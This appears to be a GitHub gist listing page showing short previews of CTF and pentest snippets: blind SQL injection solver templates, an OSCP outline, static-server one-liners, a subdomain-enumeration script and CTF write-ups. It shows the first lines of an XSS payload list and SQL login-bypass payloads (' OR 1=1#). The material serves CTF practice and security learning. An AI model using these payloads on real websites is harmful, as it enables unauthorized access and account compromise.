Skip to content

Instantly share code, notes, and snippets.

@abdilahrf
abdilahrf / legcountersolve.py
Last active Oct 3, 2019
Leg counter web challenges solver (Blind SQLi Template)
View legcountersolve.py
import requests
import re
from StringIO import StringIO
from pycurl import *
import os
import pickle
url = "http://103.56.207.107:50001/upload.php"
payload = {
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@abdilahrf
abdilahrf / web-servers.md
Created Mar 10, 2018 — forked from willurd/web-servers.md
Big list of http static server one-liners
View web-servers.md

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@abdilahrf
abdilahrf / blind_sqlinjection.py
Last active Dec 8, 2020
Blind SQL injection Template
View blind_sqlinjection.py
import requests
import re
url = "http://88.198.233.174:33534/index.php"
payload = {
"username":"",
"password":"x",
}
def check(data):
@abdilahrf
abdilahrf / 666_lines_of_XSS_vectors.html
Created Nov 27, 2017 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
View 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@abdilahrf
abdilahrf / sqli-mezzanie-owaspctf.py
Created Sep 23, 2017
Solution for sqli level 1-6 except 5
View sqli-mezzanie-owaspctf.py
import requests
import re
#GLOBAL
base_url = "http://mezzanine.mysterious-hashes.net/"
format_flag = "flag{%s}"
#LEVEL 1
payload = {
"user": "' OR 1=1#",
"pass": "' OR 1=1#"
@abdilahrf
abdilahrf / crt.sh
Created Sep 13, 2017 — forked from 1N3/crt.sh
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
View crt.sh
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
@abdilahrf
abdilahrf / gist:65bb60222cae8c2158004dbde27857ae
Created Jun 1, 2017
Codegate 2014 CTF, web "120" write-up
View gist:65bb60222cae8c2158004dbde27857ae

Task

You are given a URI (all happens in the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to index.php, the same but ends with index.phps and is an alleged source code of the former, finally, index.php contains a link to auth.php

index.phps listing below

<?php
session_start();

$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);
@abdilahrf
abdilahrf / rcdn_solution.py
Created May 23, 2017 — forked from rkmylo/rcdn_solution.py
RCTF 2017 - rCDN Solution
View rcdn_solution.py
# coding: utf-8
"""
Unfortunately solved 20 minutes after the end of the CTF :(
"""
import re
import sys
import string
import requests
@abdilahrf
abdilahrf / rfile_solution.py
Created May 23, 2017 — forked from rkmylo/rfile_solution.py
RCTF 2017 - rFile Solution
View rfile_solution.py
from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'
def totimestamp(dt, epoch=datetime(1970,1,1)):
td = dt - epoch
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6